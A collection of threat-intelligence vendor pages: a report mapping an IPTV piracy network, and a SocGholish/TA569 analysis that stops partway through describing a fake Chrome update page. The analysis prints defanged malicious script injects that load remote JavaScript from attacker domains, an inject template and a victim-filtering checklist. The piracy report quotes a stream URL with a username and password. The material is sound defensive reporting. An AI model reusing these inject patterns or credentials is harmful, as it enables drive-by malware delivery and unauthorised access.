Preemptive Cyber Defense Use-Cases

Silent Push helps cybersecurity teams block threats early, by delivering attacker infrastructure intelligence at scale, with context and insight not available in any other CTI platform.

By identifying adversary campaigns as they are being setup, Silent Push significantly minimizes risk, reduces cost, and improves efficiency by replacing multiple CTI tools in one platform.


Ready to dive deeper into the world of preemptive threat intelligence? Begin your journey with the Silent Push free Community Edition today.


Integrations Overview

Integrations Overview

Silent Push integrates proprietary threat intelligence and Indicators of Future Attack (IOFA)™ directly into your existing SIEM and SOAR platforms to automate decisions and accelerate response times.

This enables your team to shift to a proactive defense posture by preemptively discovering attacker infrastructure, all without complex changes to your current security stack.


Ready to dive deeper into the world of preemptive threat intelligence? Begin your journey with the Silent Push free Community Edition today.


Massive IPTV Piracy Network Uncovered by Silent Push

Key Findings

  • Silent Push has uncovered a massive Internet Protocol Television (IPTV)-based piracy network that has been active for several years and is currently hosted across more than 1,000 domains and over 10,000 IP addresses.
  • Our threat research team has identified a company, XuiOne, involved in profiting from hosting this pirated content. This practice is alarmingly lucrative: studies reveal that pirated content, including illegal IPTV streams, generates billions of dollars annually for its operators.
    • More than 20 major brands have been affected by this ongoing hosting of pirated content, including: Prime Video, Bein Sports, Disney Plus, NPO Plus, Formula 1, HBO, Viaplay, Videoland, Discovery Channel, Ziggo Sports, Netflix, Apple TV, Hulu, NBA, RMC Sport, Premier League, Champions League, Sky Sports, NHL, WWE, and UFC.

Update: The individual previously mentioned as connected to the network infrastructure referenced in this report reached out to us to confirm that neither they nor their company had any involvement in IPTV activities. At the individual’s request, and as they have denied knowledge of, or direct participation in, the copyright infringement outlined below, we have removed all references to them in this report. 


Executive Summary

Silent Push Threat Analysts discovered a massive network of IPTV-based piracy, currently hosted across more than 10,000 IP addresses and 1,100 domains, that has been operating for several years and affecting more than 20 major brands. Our finding of more IP addresses than websites across this network is unique for most cyber threats we track, but it appears to be a fairly standard practice for IPTV networks.

We have identified the company, XuiOne, as being involved in profiting from hosting pirated content.

It’s important to note that, while our team has confirmed a significant portion (if not all) of this network’s content is unlicensed (re: pirated) with no hallmarks of legitimacy, conclusive verification ultimately requires responses from each of the affected brands. Without such confirmation, it is technically possible that some media companies may have a licensing agreement with these hyper-aggressive IPTV networks. However, our team has observed no evidence to support that conclusion.

As a final note: One of the websites in the network, known as “JVTVlive,” openly claims to have “2,000 servers in 198 countries” (jvtvlive[.]com/faq/). Based on the data we’re tracking, these bold claims appear to be accurate.



IPTV and streaming are not the same. While IPTV and streaming are both methods of delivering content over the internet, they differ in how the content is delivered and accessed. There are also differences in reliability, accessibility, and the types of devices used for content delivery and viewing.

IPTV uses a private, dedicated network managed by the service provider to deliver content, typically via a set-top box or the internet. Streaming, often referred to as “OTT” or Over-the-Top, bypasses traditional service providers and utilizes the open internet for viewers to access content on a wide range of devices, including smart TVs, computers, tablets, and smartphones.


Webinar 23 Sept. 2025: “Stopping Piracy Distribution Networks at Scale”

Join Silent Push Threat Analysts for a special webinar discussing how we exposed a massive IPTV-based piracy network targeting major media brands. In this threat intelligence session, our team will share how you can dissect adversary TTPs to map infrastructure, master proactive detection, and protect your brand.

Don’t wait for takedown notices. Register now to learn how to dismantle piracy networks before they grow.


IPTV Piracy Network Background

Common examples of legitimate providers of IPTV content include Hulu and YouTube TV. Access to this type of content typically relies only on an internet connection, so it is often abused for the delivery of pirated content, such as content provided without a license from the content rights holder.

Common characteristics of illicit/pirated content IPTV operations include:

  • Illegal restreaming of licensed channels: Capturing legitimate TV feeds and redistributing them without permission.
  • Subscription fraud: Selling access to premium content at a fraction of the cost (for example, offering deals of “$15/month for 22,500 channels and 100,000 Movies & TV Shows” found from “jvtvlive[.]xyz”).
  • Use of the term “IPTV”: Most enterprise streaming services don’t use the term “IPTV,” but illicit streaming providers often do.

While digital piracy is illegal, it remains a booming underground market for several reasons. According to a 2024 Piracy Trends and Insights report from monitoring and content protection firm MUSO, TV piracy tends to rise in popularity due to “platform fragmentation” and “legitimate options failing to meet expectations in price, access, or timing.”

The Guardian notes that content titles are scattered, and escalating prices lead to an “artificial scarcity in a digital world that promised abundance.” It attributes the increasing interest in piracy to a “service issue,” where consumers face rising rental/subscription costs alongside fewer options for shorter periods.

IPTV piracy also poses significant risks to users, including financial fraud, malware infections, and legal consequences. Many consumers involved in IPTV piracy experience fraudulent charges to their credit cards after paying for pirated content through streaming services. Piracy app and website users are more likely to be victims of identity theft compared to non-pirating users. Piracy sites are also known for distributing malware that can steal personal data or infect devices.

When it comes to tracking these networks, the Silent Push platform makes it easy to map out the entire infrastructure supporting IPTV networks that advertise illicit/pirated content. Combining just a few technical fingerprints can be all that is needed to arm rights holders with the details they need to combat these pirates’ operations successfully.

Operational Security (OPSEC) Note: The analytical and infrastructure fingerprinting methods used by our team to enumerate this piracy network cannot be shared publicly; however, they are available in a more detailed report for our Enterprise clients.


Beginning Our Investigation

A research partner shared an initial indicator with us, premiumplustv[.]xyz, that had been hosting pirated content. From this single starting point, and utilizing the Silent Push Web Scanner, our team was then able to create a technical fingerprint connecting this service to more than 10,000 IP addresses and 1,100 domains.

The xuione[.]com website, seen below, is a massive IPTV provider that appears to support numerous pirated content schemes – confirming the initial suspicions of our research partner.

Screenshot of XUIone website page
Screenshot of the “XUIone” website

For several years, the xuione[.]com website listed details indicating the registrant was based in Herat, Afghanistan.

Screenshot from the Silent Push platform of 2022 WHOIS records for xuione[.]com
Screenshot from the Silent Push platform of 2022 WHOIS records for xuione[.]com

Then, in March 2025, the registration details were updated to redact the Herat, Afghanistan, location data and replace it with a generic U.S. location.

Screenshot from the Silent Push platform of 2025 WHOIS records for xuione[.]com
Screenshot from the Silent Push platform of 2025 WHOIS records for xuione[.]com

Interestingly, while researching the XuiOne brand further, we conducted a quick Google search for the initial lead domain. There, we noticed a result for a “Debug Mode” from the domain that had a rather interesting URL path format: “premiumplustv[.]xyz:8080/get.php?username=TvWorld7382P&password=sYymzstukq&type=m3u“

Google search screenshot of “premiumplustv[.]xyz”
Google search screenshot of “premiumplustv[.]xyz”

Checking the same full URL in our own Silent Push Live Scan capability, we confirmed the “XUI.one – Debug Mode” HTML Title response seen on Google.

Screenshot from the Silent Push platform of the “premiumplustv[.]xyz” website
Screenshot from the Silent Push platform of the “premiumplustv[.]xyz” website

In the next step, we will examine these pages and additional publicly shareable details.


Connections to Stalker Portal

Reviewing our previous XuiOne fingerprints also revealed connections to “Stalker_Portal,” another well-known open-source IPTV project that has been available for over a decade.

Stalker_Portal is the name of an open-source IPTV project that has been in existence for over 12 years. The code appears to be owned by Infomir[.]eu, which provides IPTV services. The phrase “Stalker Portal” is used by various projects that utilize the Infomir code, and it appears that the phrase is casually used to describe the backend management system of some IPTV providers.

Examples of Stalker_Portal being advertised can be seen below:

Example of Stalker Portal on GitHub
Source: github[.]com/Jitendraunatti/Stalker-Portal

Screenshot of Xtream and Stalker IPTV web page
Source: play[.]google[.]com/store/apps/details?id=com[.]ikrabouda[.]cccam48h&hl=en


Returning to Open-Source Intelligence (OSINT) for a moment, it’s possible to discover places where these domains have been spam-promoted, along with potentially related domains that Google picked up. In seeking to share this publicly, our team was able to create this effective “Google Dork”* based on the progress made so far.

*Note: A Google Dork is a specially crafted search query that uses “advanced” operators (such as site:, intitle:, filetype:) to find specific information on the web that’s not easily visible through normal searches.

Google Dork link: https://www.google.com/search?q=inurl%3A%22type%3Dm3u%22+inurl%3A%22get.php%22&filter=0

The Facebook group where this was posted is also notably sharing other, similar URLs. Still, many appear to have the username/password parameters, a practice often seen on Telegram by similar types of accounts.

On the Facebook group, commenters indicate whether a site is online by posting comments like “Off,” suggesting that these sites are often only accessible for brief periods or to specific users or IP addresses and locations. That group can be found here: https[:]//www[.]facebook[.]com/groups/862409924169988/.

Notably, they include an Arabic phrase for “servers’ address”: “سيرفرات إدريس ”.

Screenshot of group activity

It’s common to see people post “Does not work” or similar comments:

Source: “سيرفرات إدريس”| Facebook screenshot of group activity
Source: “سيرفرات إدريس”| Facebook screenshot of group activity

The format for many of the URLs being shared is relatively consistent, although the domain and the username/passwords being shared are chaotic, and the ports appear to change intermittently as well:

Screenshot from the Facebook group
Screenshot from the Facebook group

Examining the repetition, the most common format appears to be:

“http://domain[.]suffix:{Random_Port}/get.php?username={value}&password={value}&type=m3u&output={value}”.

Knowing the structure of the URLs used, our team was able to find evidence that this streaming network has been promoted across the web for years. Here’s an example from Imgur in 2018:

Gallery screenshot from Imgur
Source: imgur[.]com/gallery/http-tvdomel-com-8880-get-php-username-paulomoreira-password-939857-type-m3u-output-ts-wlPi0.


Dedicated IP Reveals New Domains

As we continued the investigation, our team noted that the xuione[.]com domain has been mapped to multiple A records, each of which appears to be a low-density, shared IP address. Since these small ranges also contain other IPTV websites, it’s likely that those sites are also part of this network.

An example of one such cluster can be seen by enriching the IP in question, 158.220.114[.]199, in our Total View:

Screenshot of Silent Push Total View enriching IP address 158.220.114[.]199
Screenshot of Silent Push Total View enriching IP address 158.220.114[.]199

Our team identified two IPTV-focused domains utilizing the dedicated IP address 158.220.114[.]199, which is also used by xuione[.]com. The first is self-evident, but the second is more interesting:

  • streamxpert[.]net
  • jvtvlive[.]xyz
 Screenshot of “streamxpert[.]net” website
 Screenshot of “streamxpert[.]net” website

The second result, the JVTV website, jvtvlive[.]xyz, touts its services as:

“Top-notch JVTV live Subscription Provider: Unlock a World of Entertainment with Our Service: Access Thousands of Global Channels, Countless Movies, and an Extensive Collection of Series!”

Screenshot of “jvtvlive[.]xyz” website
 Screenshot of “jvtvlive[.]xyz” website

JVTV’s service includes promotions listed for the following “channels”: Prime Video, Bein Sports, Disney Plus, NPO Plus, Formula 1, HBO, Viaplay, Videoland, Discovery Channel, Ziggo Sports, Netflix, Apple TV, Hulu, NBA, RMC Sport, Premier League, Champions League, Sky Sports, NHL, WWE, and UFC.

Screenshot of JVTV promoting its offerings on the website “jvtv[.]xyz”

JVTV claims to have “2,000 servers across 198 countries” on its website:

Screenshot of JVTV’s “Contact Us” page with a global map of its servers
 Screenshot of JVTV’s “Contact Us” page with a global map of its servers

JVTV also provides a channel list for each country:

Screenshot of JVTV’s list of offered channels
Screenshot of JVTV’s list of offered channels and country locations: “jvtvlive[.]xyz/channel-list/”

Sign Up for a Free Silent Push Community Edition Account

Register now for our free Community Edition to use all the tools and queries highlighted in this blog.


Mitigation

Silent Push’s unique visibility into the ever-shifting sands of the internet’s global architecture, and the peerless first-party data sources that support it, regularly provide our customers with pre-breach intelligence in the form of our Indicators Of Future Attack™ (IOFA™) Feeds.

Our platform’s ability to map attacker infrastructure before it can be weaponized also enables the rapid and comprehensive detection of content piracy networks, such as those described above.

In service to that, our analysts have constructed a pair of Bulk Data Exports containing the growing list of indicators focused on these types of IPTV-based pirates that our customers can use to support their brand protection investigations. These exports include:

  • IPTV Piracy Domains
  • IPTV Piracy IP addresses

Silent Push’s Bulk Data Exports are available as part of an Enterprise subscription. Enterprise users can use this data to support their investigations or pivot across piracy-related infrastructure in our platform.


Sample IPTV Piracy Network IOFA List

Below is a sample list of Silent Push IOFA™ associated with the IPTV Piracy Network. Our complete list is available for enterprise users.

  • iptvadvice[.]com
  • jvtvlive[.]xyz
  • streamxpert[.]net
  • xtreamui[.]org
  • xuione[.]one

Continuing to Track IPTV-based Piracy Networks

Our team continues to actively monitor IPTV-based piracy networks, which host and stream illicit/pirated content, as well as their associated infrastructure.

Silent Push Enterprise customers enjoy customer-only reporting streams on this threat and many others. Where possible, we will share the details that can be made public with our readers.

If you or your organization has any information on this topic or would like to reach out for a demo on how we can help your brand map out a network that is pirating your content, we look forward to hearing from you.

Workshop – Proactive Monitoring: Turning Intelligence Into Action

In this hands-on workshop, we’ll dive into how proactive monitoring helps to stay ahead of threats, reduce response times, and turn visibility into decisive action.

We’ll review practical ways that threat intelligence can be used across investigations and incident response with examples that show how to leverage your own security alerts to build a more proactive security posture.

  • Date: 16 September 2025
  • Time: 10am ET // 4pm CET // 10am SGT // 12pm AEST
  • Location: Online – Zoom
  • Requirements: Silent Push free Community Edition | Sign-up here

Silent Push Expands EMEA Footprint Through Strategic Partnership with CyberLion 

Silent Push is proud to announce a new strategic partnership with CyberLion Ltd., a leading cybersecurity distributor specialising in enterprise and government-grade defense solutions across the EMEA region. 

This partnership marks a significant step forward in Silent Push’s expansion into EMEA markets, providing partners with direct access to the Silent Push platform – a preemptive cyber defense solution that allows security teams to uncover, track, and neutralize attacker infrastructure before it is weaponized. 

CyberLion’s deep regional knowledge and strong relationships with enterprise and public sector organizations make them an ideal distribution partner. This new collaboration means that Silent Push is positioned to empower enterprise and critical infrastructure defenders across EMEA with proactive, infrastructure-focused threat intelligence that goes way beyond reactive IOCs. 

“We’re proud to add Silent Push to our cybersecurity portfolio, offering our partners a cutting-edge threat intelligence solution that proactively identifies and neutralizes threats before they strike,” said Arie Wolman, EVP Sales at CyberLion Ltd. 

“CyberLion understands the operational demands of private and public sector security teams across EMEA. By combining their regional expertise with our ability to surface attacker infrastructure at scale, our partnership ensures defenders in gain earlier visibility into emerging threats, long before traditional tools detect them. We’re looking forward to working alongside them,” said Ken Bagnall, CEO at Silent Push. 

To learn more about Silent Push or inquire about partnership opportunities, get in touch here. 


Ready to dive deeper into the world of preemptive cyber defense? Begin your journey with the Silent Push free Community Edition today.

Unmasking SocGholish: Silent Push Untangles the Malware Web Behind the “Pioneer of Fake Updates” and Its Operator, TA569

Key Findings

  • SocGholish, operated by TA569, actually functions as a Malware-as-a-Service (MaaS) vendor, selling access to compromised systems to various financially motivated cybercriminal clients.
  • The primary tactic used involves deceptive “fake browser update” lures, often initiated by JavaScript injections on compromised websites, which lead to drive-by malware downloads.
  • SocGholish leverages Traffic Distribution Systems (TDSs) like Parrot TDS and Keitaro TDS (the latter notably used in Russian disinformation campaigns) to filter and redirect victims to malicious content.
  • Thus, TA569 acts as a vendor, or an Initial Access Broker (IAB), enabling other notorious groups and even the Russian GRU’s Unit 29155 (via Raspberry Robin) to conduct follow-on attacks, including ransomware deployments.
  • SocGholish also utilizes domain shadowing and rotates its active domains frequently in order to evade detection, making proactive threat intelligence crucial for a reliable defense.

Executive Summary

Silent Push Threat Analysts have been rigorously tracking SocGholish and its operators, TA569, since 2024. This evolving threat most commonly masquerades as legitimate software updates, fooling users into unknowingly compromising their systems. The core of their operation is a sophisticated Malware-as-a-Service (MaaS) model, where infected systems are sold as initial access points to other cybercriminal organizations.

As referenced above, TA569 serves as a vendor for the malware, selling infections to various clients for exploitation, including many advanced persistent threat (APT) groups, such as LockBit and Evil Corp. They also sell to threat actors using information stealers and remote access Trojans (RATs), including WastedLocker, NetSupportRAT, Hades, and Dridex, which remain a concern despite some successful global takedown efforts.

The widespread nature of SocGholish attacks, affecting countless individuals and enterprises, underscores the urgent need for better intelligence to defend against this pervasive threat.

Our ongoing research here at Silent Push provides critical insights into SocGholish/TA569’s tactics, techniques, and procedures (TTPs) as well as Indicators of Future Attack (IOFA) feeds to block at the gate. This public report, a condensed and operational security-minimized version of our internal customer reports, covers everything from SocGholish’s use of obscure domain names and fast-flux infrastructure to its strategic deployment of Traffic Distribution Systems (TDSs).

For access to our unredacted report on SocGholish, please contact our team @ [email protected] or book a demo with our experts right here to get the very latest in pre-emptive threat intelligence.



SocGholish Webinar: “From Fake Updates to Real Breaches”

Join Silent Push August 21, 2025, for a SocGholish/TA569 deep dive and learn proactive techniques for detecting malicious activity before a breach occurs.

Whether you’re triaging alerts, responding to incidents in real time, or tracking threat actor infrastructure and TTPs, this webinar will better equip you to preemptively mitigate one of the internet’s longest-running and most successful deception-based threats.

Register to attend one of three sessions: North America (12:00PM ET), EMEA (12:00PM CET), or APJ (10:00AM SGT).


Background

Given its prevalence, Silent Push Threat Analysts refer to SocGholish as the “Pioneer of Fake Updates.” It began as a relatively straightforward malware family that has since evolved into a sophisticated Initial Access Broker (IAB), operating as a crucial stepping stone for cyber criminals.

While there is some disparity among multiple cybersecurity reporters, the first public mentions of SocGholish malware date somewhere between the end of 2017 and mid-2018. Aliases associated with SocGholish include “FakeUpdates” and the notorious fake update framework’s operator, “TA569.”

The group behind SocGholish, TA569, is also referred to as “Mustard Tempest,” “DEV-0206,” and “UNC1543.” Meticulously crafting its lures, primarily disguised as urgent browser updates for Chrome or Firefox, and other software like Adobe Flash Player or Microsoft Teams, TA569’s deceptive approach capitalizes on a lack of end-user education and the perceived necessity of software updates, turning a routine security practice into a vector for compromise.

Evidence obtained by Silent Push points to significant connections between SocGholish and Russia, with affiliates like Keitaro TDS having Russian ties and some infrastructure hosted in Russia. In this report, our team also examines other connections to Russia via DEV-0243, Raspberry Robin, Dridex, LockBit, and Evil Corp.


Behind the Threat: The Business of Cybercrime

SocGholish isn’t just a piece of malware; it’s a business model. With TA569 operating as a MaaS provider brokering compromised system access to a diverse clientele, threat actors purchasing SocGholish malware kits and services are able to launch their cyberattacks with little to no technical expertise. This specialized role as an IAB helps to support an ecosystem where different criminal groups collaborate for mutual gain.

These threat actor clients are often financially motivated APT groups, including some of the most notorious in the cybercriminal underworld:

  • Evil Corp (DEV-0243): A prominent Russian cybercrime actor, known for ransomware deployment, particularly Lockbit Ransomware, post-2019 sanctions.
  • LockBit and Dridex: Malware families frequently linked to Russian cybercrime, benefiting from SocGholish-provided access.
  • Raspberry Robin: A complex worm, initially spread via “Bad USB” attacks, which Microsoft observed pushing the SocGholish on-device agent. Interestingly, Raspberry Robin itself has ties to the Russian GRU’s Unit 29155.

A single initial infection can lead to multiple, cascading threats orchestrated by different, specialized actors. SocGholish’s filtering mechanisms, described in greater depth below, indicate a strategy to maximize profit by selling the most lucrative access only to those cybercriminals willing and able to pay.


A Visual Representation of SocGholish/TA569’s Infection Chain

To enhance public understanding of the complex SocGholish/TA569 threat landscape, our team is providing a concise overview of the SocGholish cluster and its operators’ role as an IAB, drawing on multiple sources of public research and our collective expertise researching all of the parts involved behind these interconnected threats.

A High-Level SocGholish Infection Chain Rundown

To support that effort, our team has crafted the following infographic (found below) to outline the complex global framework of SocGholish’s malicious activity, how it routes across various providers, and to display both where and how different payloads are delivered to potential targets.

This graphic displays the entire chain: from the initial victim’s visit to an infected website, including the various stages, until the final on-device payload implant.

Aside from the Raspberry Robin campaign noted in 2022, which we will discuss in more detail later in the blog, our team has observed that SocGholish infections typically originate from compromised websites that have been infected in multiple different ways.

Website infections can involve direct injections, where the SocGholish payload delivery injects JS directly loaded from an infected webpage or via a version of the direct injection that uses an intermediate JS file to load the related injection.

Infographic of SocGholish (operated by TA569) High-Level Infection Rundown
Infographic of SocGholish/TA569’s infection chain

Powerful Traffic Distribution System Techniques

The primary sources of traffic for the SocGholish affiliate network framework, aside from direct injection of SocGholish domains into compromised websites, are traffic distribution systems (TDSs). More specifically: Parrot TDS and Keitaro TDS, which TA2726 operates.

Typically part of online advertising infrastructure, the primary function of these systems is to direct web traffic to specific websites or to landing pages.

In online advertising, TDSs are used to present targeted advertisements to the website visitor. To accomplish this, a TDS uses extensive fingerprinting of the website visitor, gathering information such as the user’s IP Address, browser name, type, version, various browser configurations, the source of the traffic, and more to determine what ad to present. It also allows advertisers to track the performance of their ads by presenting statistics on the number of visitors coming from a specific source and how many visitors who saw a particular ad also clicked on it.

This can be extended further via custom URL parameters that allow tracking of additional statistics, such as “which ad campaign directed the user to the TDS link.”

By employing these methods, an advertiser can, for example, send a targeted ad for an Android application in Spanish to a user visiting the TDS link from Spain (based on their IP) with an Android device (based on the fingerprint of the browser, such as “UserAgent,” or “screen size,” etc).

While some may see this as invasive, the technique itself is not inherently malicious.

Threat actors, however, realized more than a decade ago that the same TDS technology used for Advertisement Traffic Direction (ATD) could also be used to redirect users to certain types of fraud. By setting up websites with a redirect via a TDS or by injecting links into compromised websites, an attacker using a TDS can present a visiting user/victim with targeted malicious content of their choice.

This comes with immense advantages for threat actors, often enabling them to evade detection by network defenders and cybersecurity researchers. It also allows threat actors to monetize traffic for devices they do not target directly by reselling that traffic to other actors who might have a use for it.

For example, early reported use cases of TDS in cybercrime were associated with exploit kits, which are web frameworks that attempt a series of exploits against a website visitor to achieve a drive-by compromise. Cybercriminals use these malicious toolkits to automate the exploitation of software application vulnerabilities, with the primary goal of delivering malware, such as ransomware, spyware, or Trojans, onto a victim’s device without their knowledge or consent. 

Using a TDS, attackers can direct users to an exploit kit that targets a specific (and thus known-vulnerable) browser. This shielded their fraudulent efforts from the portion of the internet using updated software and only targets those that an attacker has already identified as vulnerable. It is also an effective method to reduce the number of actual exploit attempts seen in the wild, as defenders may be unaware that an outdated browser is being sent to different websites via the injected TDS, rather than an updated browser.

SocGholish’s infrastructure utilizes TDS techniques in nearly every step of the infection process. The injected SocGholish JS, which we detail later in the report, uses these methods to redirect users to next-stage JavaScript redirect scripts and browser-specific FakeUpdate templates. The on-device SocGholish stager then utilizes a TDS to differentiate between high-value, low-value, and “illegitimate” targets, whereupon it either delivers the payload or takes no action, as appropriate.

As referenced in the infographic (above), two specific TDSs are commonly observed in the attack chain before the infection stage: Parrot TDS and Keitaro TDS. Both are used before redirecting to SocGholish injects and thus don’t strictly need to be owned by SocGholish itself—further complicating attribution. To properly explain their role, we will cover each TDS in depth below.

Parrot TDS

First reported on by Avast in 2022, Parrot TDS is both the earliest and most well-known system referenced in association with SocGholish. Even in the earliest reports on Parrot TDS, SocGholish was identified as its primary customer.

This TDS can be distinguished from others in traffic by the unique form of its JavaScript injects, which contain a technical fingerprint that we are unfortunately unable to share publicly.

These injects also load an additional external JavaScript via three different methods. They either load the Parrot TDS URL directly or contact a proxy. This proxy is accessed via a .php file, which can be either locally hosted on the infected domain or a remote domain. Internally, the proxy will then load the JS via the Parrot TDS URL and return the same response as a direct query.

An example of this can be seen using a local proxy’s .php file. One infected website in this case, as of this writing, was balancedapproachk9[.]com, which had the proxy kept at the following path:

  • /assets/bootstrap/fonts/getunwashed/admin/view/stylesheet/stylesheet.php

On a final note, there were a few more technical fingerprints of value to our researchers during this investigation, which we have shared with our customers in our internal reporting on the subject. Unfortunately, for operational security reasons, we were unable to include them in this piece.

Keitaro TDS

Keitaro TDS is another TDS often seen used in conjunction with SocGholish infections. In contrast with Parrot TDS, however, this TDS is openly promoted as an advertising tool by a company that is legitimately registered. It can even be licensed from: “hxxps[:]//keitaro[.]io/

Defenders and the Media Question Keitaro’s Legitimacy

Keitaro’s parent company, Apliteni, is based in Delaware. However, its CEO previously lived in Russia (now Spain), and at least seven of Apliteni’s employees indicate they are based in Russia on LinkedIn. In the context of the other ties back to Russia observed in the SocGholish infrastructure chain, this raises questions about the company’s otherwise serious public image. Another notable finding that draws the Russian connection yet closer is the observation that Keitaro TDS has been heavily used in Russian disinformation campaigns.

TechTarget wrote about Keitaro TDS back in 2024, reporting that over the past eight years, “Despite being described as a legitimate TDS by Microsoft and other security vendors, Keitaro has been referenced in numerous threat reports from various cybersecurity vendors and researchers.” The article further notes, “Researchers say Keitaro is one of the most widely used TDSes in the threat landscape, with threat activity going beyond malvertising schemes and tech support scams that infect consumer devices. Numerous threat reports have documented complex threat campaigns with some of the most notorious ransomware, malware, and exploit kits that have long plagued enterprises.”

A notable actor to consider in the context of Keitaro TDS is TA2726, which Proofpoint highlighted as a traffic provider for both SocGholish and TA2727. The gist of the article states that TA2726 compromises webpages, injects them with its own Keitaro TDS link, and then resells that traffic to SocGholish as well as TA2727 and other actors. For SocGholish, the payload is the usual injected JS, which ultimately leads to fake update pages and a Windows-specific SocGholish agent.

For TA2727, payloads are tailored to match the potential victim’s operating system. Windows typically receives DoiLoader and LummaStealer, whereas macOS receives an information stealer known as FrigidStealer, and Android devices are redirected to a download page for the Marcher Banking Trojan.

One note of interest here is that SocGholish appears to be delivered exclusively to North American (USA and Canada) Windows devices. In contrast, TA2727 payloads are delivered mostly to other countries, with the U.K. and France both explicitly named in the Proofpoint piece. MacOS traffic from the US and Canada is also redirected to TA2727. This may indicate a preference in SocGholish targeting or attunement to the needs of a specific SocGholish customer.

In an earlier iteration, an actor using Keitaro TDS redirected traffic from Windows devices to SocGholish TDS while redirecting all other traffic to the VexTrio malvertising framework.

Due to the public availability of Keitaro TDS, we can’t fully confirm that this was the same actor as TA2726. However, technical evidence uncovered by the Silent Push threat team reveals a connection between these activities.

The typical TA2726 inject looked like this, where the group redirects to VexTrio for all non-Windows clients:

Example of a typical TA2726 injection
Example of a typical TA2726 inject

Among the many domains tracked using this inject in July 2024, Silent Push also monitored the following:

  1. bigbricks[.]org
  2. biggerfun[.]org
  3. cancelledfirestarter[.]org
  4. catsndogz[.]org
  5. climedballon[.]org
  6. cloudwebhub[.]pro
  7. codecruncher[.]pro
  8. daddygarages[.]org
  9. dailytickyclock[.]org
  10. deeptrickday[.]org
  11. searchgear[.]pro
  12. rapiddevapi[.]com
  13. cp[.]envisionfonddulac[.]biz

The injects from these domains can still be observed on many victim sites. One of which is the infected site: hxxps[:]//www[.]teatree[.]si, which at the time of this writing, (August 2025) had the following in its source code:

Source code example from the infected site teatress[.]si
Source code example from the infected site: hxxps[:]//www[.]teatree[.]si

We can see the website has been hit several times by the “khutmhpx” inject. Yet, we can also see a second type of injection:

The injection uses the same domain as one of the "khutmphx" injections

The injection utilizes the same domain as one of the “khutmphx” injections, providing the hard technical evidence we were looking for that the same threat actor cluster has used both.

Example of the second inject that was recently discovered

A second inject that our team discovered recently begins with “function(f,b,n,x,e).” A variant of it can be observed on the infected website: gitomer[.]com:

Screenshot of the gitomer[.]com variant observed
Screenshot of the variant observed on gitomer[.]com

Note that the domain used in the inject above is “rapiddevapi[.]com”. The same page contains two additional injection types (Injection Type 3 and Injection Type 4).

Inject Type 3 appears as so:

Screenshot of Inject type 3
Screenshot of Inject Type 3

Decoding the Base64 unveils:

rapiddevapi[.]com/M3P2n8Uaz6wsh7s2fgSRwIiSadn4Wz1fNsRbVwXrW

We can observe two things here: First, that this third inject reuses the same domain as the second inject we just highlighted. Second, it utilizes the “function(f,b,n,j,x,e)” identifier. Knowing this, we can now tie these two injects together, creating a connection between injects 1, 2, and 3.

However, this page also provides evidence linking these injections to yet another inject type. On closer examination, we can identify the following lines spread throughout the page source code, where we can see the domain “rapiddevapi” being used in a fourth inject variant:

Screenshot of the domain “rapiddevapi” being used in a fourth inject variant
Screenshot of the domain “rapiddevapi” being used in a fourth inject variant

This fourth inject is highlighted as a TA2726 inject by Proofpoint (who originally assigned that name to this threat cluster). Furthermore, from this, we were able to confirm overlaps between Inject 3 and 4 across four additional domains:

  1. hxxps[:]//leatherbook[.]org/
  2. hxxps[:]//webapiintegration[.]cloud/
  3. hxxps[:]//blacksaltys[.]com/
  4. hxxps[:]//packedbrick[.]com/

Three of the domains are known indicators for TA2726. This allowed us to trace TA2726’s activity back to at least March 2024 and tie it to the VexTrio campaign redirects from the same period.

Based on this, it is likely that VexTrio was a client of TA2726, just as TA2727 is now, with SocGholish being a constant client of theirs for over a year.

Example of all three injection types using the domain rapiddevapi[.]com, seen on the infected site gitomer[.]com
Example of all three injection types using the domain rapiddevapi[.]com, seen on the infected site gitomer[.]com

As seen from the example screenshot above, a typical TA2726 inject currently appears like this:

<link rel='dns-prefetch' href='//inject domain' /> // potentially other website content <script type="text/javascipt" src="inject-domain/id id=<varname>"></script>

This variety of injection utilizes a DNS-prefetch statement to the injection domain, typically located near the top of an infected page. This leads to a DNS resolution upon page load, followed by the actual resolution of the full URL in a separate script tag at a later point.

The SocGholish Inject

Regardless of which of the previously described paths a victim takes, if SocGholish is delivered, the victim will be presented with specific details (which we currently cannot share publicly).

However, given the reuse of those details, once they are observed, our team is then able to assess with high confidence that we are examining domains controlled and operated by SocGholish/TA569.

Early versions of SocGholish-related domains used a CID parameter, which was likely associated with different campaigns (or traffic providers). After several updates in which this parameter became increasingly obfuscated, however, its use has tapered off and has not been seen recently. However, we are including that detail as the information may still be encoded in the first-stage parameter.

The domains in this stage also seem to vary by traffic source. For example, the URL store[.]alignfrisco[.]com is the current domain/hostname related to the Parrot TDS chain.

Separately, a direct inject, which does not rely on a TDS and can also be found directly in the HTTP body of an infected site (as seen in the example below), would have a different domain such as cp[.]envisionfonddulac[.]biz, from a set of domains for direct injects and injects via TA2726.

Example of a direct inject that doesn’t rely on a TDS:

<script async src="https://cp[.]envisionfonddulac[.]biz/vk009sVvV5/
abw7EiXkY1M0kUNSEewTFj3UN2pw/FsycJ0CM1zRDmt8qV5zMOlqa1yAWiw=="></script>

These domains are occasionally rotated, though not as often as the C2 server proxies we will cover later in the report.

We have assessed with low confidence that these URLs were created for each traffic source provider, allowing SocGholish to track their performance. However, it could also have been an evasion technique used to avoid relying on a single domain.

It is essential to note that significant care has been taken to ensure proper victim identification here. This can be seen at this stage, which filters out users once again, even if previous stages have already done so via the TDS setup. The SocGholish framework also considers several code-based aspects at this stage, each of which is listed below.

SocGholish makes sure to filter the following in this stage:

  1. WordPress admin users do not get a payload
  2. Users who have already executed the payload do not get served again
  3. Users who use an automated web browser (using webdriver) get redirected to the first type of payload
  4. Users who have an unusually small screen size (mobile phones and some sandbox solutions) get redirected to another payload
  5. Users who already have the adViewEnabledKey set to true do not get a payload because the script uses this variable to ensure the inject is only executed once.
  6. Users who have passed all these checks get served the main payload

Note: This script has an additional feature that activates the real payload only when the victim moves their mouse. This feature is also notably deactivated in the previous payload.

The main execution flow then continues with the third payload URL.

If a victim “passes” this screening, they are presented with a fake update script that is extensively highlighted. Fortunately, our team was able to log payload 3 and determine that it is the final malicious update page. As such, it has many HTML elements.

Using some formatting, we can create an image of the code:

An image of the code for the third payload
An image of the code for the third payload

The general functionality of the code is explained in the following six steps:

  1. Set windowObj.localStorage[windowObj.location.hostname] to True (Prevent reload of script, see previous stage)
  2. Defines a send statistics function that loads an “image” based on type (this image load is a method to track a user’s activity on the page)

The returned HTML document also contains some interesting strings worth examining here, among them is:

"<title>Update Chrome</title>"

